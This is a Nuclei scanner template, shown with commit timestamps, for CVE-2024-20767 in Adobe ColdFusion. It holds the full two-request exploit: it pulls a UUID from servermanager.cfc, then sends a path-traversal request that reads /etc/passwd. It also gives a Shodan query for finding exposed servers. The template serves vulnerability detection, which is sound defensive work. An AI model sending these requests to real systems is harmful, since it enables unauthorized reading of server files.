nuclei-templates/http/cves/2024/CVE-2024-20767.yaml

56 lines
2.1 KiB
YAML
Raw Normal View History

2024-03-26 04:03:06 +00:00
id: CVE-2024-20767
info:
name: Adobe ColdFusion - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
2024-03-26 08:18:03 +00:00
severity: high
2024-03-26 04:03:06 +00:00
description: |
ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
reference:
- https://jeva.cc/2973.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-20767
2024-03-26 08:18:03 +00:00
- https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html
2024-05-31 19:23:20 +00:00
- https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion
- https://github.com/Hatcat123/my_stars
2024-03-26 04:03:06 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-20767
cwe-id: CWE-284
2024-05-31 19:23:20 +00:00
epss-score: 0.08221
epss-percentile: 0.94345
2024-03-26 04:03:06 +00:00
metadata:
2024-03-26 08:18:03 +00:00
verified: true
2024-03-26 04:03:06 +00:00
max-request: 2
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2024,adobe,condfusion,lfr
http:
- raw:
- |
GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: {{Hostname}}
- |
GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1
Host: {{Hostname}}
uuid: {{extracted_uuid}}
matchers-condition: and
matchers:
2024-03-26 08:18:03 +00:00
- type: dsl
dsl:
- "contains(body_1, 'wddxPacket')"
- "contains(header_2, 'application/json')"
- "contains(body_2, '/bin/bash')"
condition: and
2024-03-26 04:03:06 +00:00
extractors:
- type: regex
part: body_1
name: extracted_uuid
group: 1
regex:
2024-03-26 04:06:32 +00:00
- "<var name='uuid'><string>(.*)</string>"
2024-03-26 04:03:06 +00:00
internal: true
# digest: 4b0a00483046022100ae51132a490d9b1610ee3525362809c3c77ac5399cb74bd5070785b43cc2441e0221008bc1d323f198a3c3c0e615caceb32d4f55678113c27be537aeb55e5a329acb35:922c64590222798bb761d5b6d8e72950